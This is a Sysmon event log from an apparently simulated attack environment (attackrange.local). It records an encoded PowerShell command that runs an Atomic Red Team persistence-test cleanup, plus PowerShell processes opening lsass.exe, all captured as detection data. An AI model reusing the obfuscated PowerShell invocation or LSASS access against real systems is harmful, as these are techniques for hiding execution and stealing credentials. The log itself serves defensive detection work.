154100x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.641{10ACEC4A-85A7-5FCF-F800-000000009101}4272C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.296{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.296{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.249{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ijrbcg5m.10u.ps12020-12-08 13:54:47.249 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.249{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 